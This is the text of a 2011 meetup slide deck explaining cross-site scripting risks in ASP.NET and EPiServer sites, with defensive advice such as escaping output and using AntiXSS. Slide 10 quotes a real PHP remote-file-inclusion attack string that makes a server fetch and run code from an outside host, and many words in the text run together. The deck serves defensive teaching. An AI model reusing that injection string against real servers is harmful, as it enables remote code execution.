1. XSS – Cross site scripting Oslo EPiServer Meetup #7 – 25th May 2011 © Creuna Slide 1

2. Definition Cross site scripting is a form ofattackwheretheattacker is able to run arbitraryjavascriptcode in a web pageviewed by anotheruser XSS compromisestheclient side, not the server Butdependingonthe nature ofthewebsite it can be a serioussecurity risk © Creuna Slide 2

3. Consequences XSS may be used to - Stealsessioncookies - Performany action thattheattackeduser has rights to do, maybeevenwithouthimknowing - Display false or modifiedcontent - XSS attacksmayspread like a software worm, for instance in a socialnetworksite. A user posts theattackingcodewhichinfects his friends, they post and so on. © Creuna Slide 3

4. Two types of XSS Non persistent: A userfollows a malicious link or form from a dangerouswebsite, email, etc. The vulnerable websitewritesthe XSS attack to theresponse, and onlythisuser is affected Persistent: The XSS attackcode is storedonthe vulnerable web site, for instance in a usercomment. All subsequentusersofthe web sitemay be exposed to the XSS attack © Creuna Slide 4

5. Wheredoesthexssattackcome from? All content from insecuresources is potentiallydangerous - Form submissions - Urls - All othersources, RSS feeds, integrated systems, etc. © Creuna Slide 5

6. Form submissions DangerouscontentmaycomethroughPOST variables Rememberthat POST requests do not necessarilyoriginate from a form on a pageyouservedtheuser, an attackermaycraft a webpage or requesttargetingyour web site DEMO (Demo showed a simple ASP.NET form writing a submittedtext back to thepageon postback. By defaultdangerous POST variables result in an exception in ASP.NET, so wearecovered, right? Next demo showed same principle in a minimallymodified EPiServer demo site, and the XSS attackwassuccessful. EPiServer turns off ASP.NETs input verification in itsdefaultconfiguration.) © Creuna Slide 6

7. Url input Do youwritethevalueofRequest.Url back to yourresponse? Yes, even ASP.NET itselfdoesthat DEMO (Demo showedusing a url with XSS in it in a standard ASP.NET web site, and wegot an exception like withthe POST attack. EPiServer proved vulnerable again.) © Creuna Slide 7

8. EPiServer ASP.NET is normallywellsecuredagainst XSS But EPiServer turnsthis feature off by default We must alwaysgiveexternal input an extrathought in EPiServer, ASP.NETs normal safetynet is turned off! © Creuna Slide 8

9. How do wesecureourselvesagains XSS? Always make sure to escape data from unsecuresourcesifyouaregoing to write it to theresponse This alsoapplies to urls, like Request.Url Do not trust yourownability to foresee all scenarios so do not writethecode for thisyourself Use a welltested and reviewedframework For instance Microsofts AntiXSS: http://wpl.codeplex.com/ © Creuna Slide 9

10. Are youusing PHP? As PHP is a script language, similarattacksmayactuallycompromisethe server side Real world example from oneofourprojects: <form method="post" action="/no/?_SERVER%25255bDOCUMENT_ROOT%25255d=http://bungalowsdemo.info/images/test.gif”id="aspnetForm"> This attackwould make the server run the PHP code in test.gif, which is not a picturebutPHP code The websitebungalowsdemo.info is probablyunknowinglyattacked and used to host theattackcode © Creuna Slide 10

11. External script files Do youincludeexternal script files in your web site? For instance, do youuseGoogles/Microsofts CDN for javascript? Real world example, web statisticstool: <script src=http://res.xtractor.no/x.jstype="text/javascript"></script> © Creuna Slide 11

12. External script files Ifyoureferenceexternal script files yougiveanotherdomain/sourcethe right to run javascriptonyour web site Of courseyoucan trust Googles or Microsofts CDN to deliver proper code But a differentdomainmay be vulnerable to DNS attacks An attackermaymanipulate DNS onthelocalmachine or network to deliverexternal scripts from a differentsource If all referenced script files are from the same domain as theviewed web pageyouavoidthisvulnerability © Creuna Slide 12

13. Questions? © Creuna Slide 13